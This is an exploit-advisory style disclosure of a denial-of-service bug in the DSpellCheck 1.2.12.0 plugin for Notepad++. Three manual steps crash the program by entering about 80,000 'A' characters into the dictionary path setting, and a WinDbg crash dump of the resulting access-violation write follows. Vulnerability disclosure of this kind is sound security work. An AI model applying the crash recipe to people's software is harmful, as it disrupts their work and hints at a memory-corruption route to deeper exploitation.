# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# vulnerable plugin Version: DSpellCheck v 1.2.12.0
# Tested in: Windows XP SP3 EN,Notepad ++ 6.5.4


POC:


1)install notepadd ++

2)open up plugins tab and select Dspellcheck and click on settings

3)In "hunspell dictionaries path" field enter large character say 80000 A's
and click on "apply"


##########################################################
(cf8.4f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060
edi=00000000
eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
ntdll!RtlpWaitForCriticalSection+0x5b:
7c919fca ff4010 inc dword ptr [eax+10h]
ds:0023:00690054=bc5d0050

####################################################

FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00690054
Attempt to write to address 00690054

FAULTING_THREAD: 000004f8

PROCESS_NAME: notepad++.exe
.

FAULTING_MODULE: 7c900000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced
memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx"
referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 00690054

WRITE_ADDRESS: 00690054

FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx

CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060)

BUGCHECK_STR:
APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE

DEFAULT_BUCKET_ID: STRING_DEREFERENCE

LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
01d0ede8 7c901046 00f56060 012feb19 01f56060
ntdll!RtlpWaitForCriticalSection+0x5b
01d0ee00 012f4cb5 00000013 012f8787 00000003
ntdll!RtlEnterCriticalSection+0x46
01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5
01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130
01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab
01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea
01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058
01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0
01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056


SYMBOL_STACK_INDEX: 2

SYMBOL_NAME: DSpellCheck!setInfo+577f5

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: DSpellCheck

IMAGE_NAME: DSpellCheck.dll

STACK_COMMAND: ~4s ; kb

BUCKET_ID: WRONG_SYMBOLS

FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo

Followup: MachineOwner

####################################################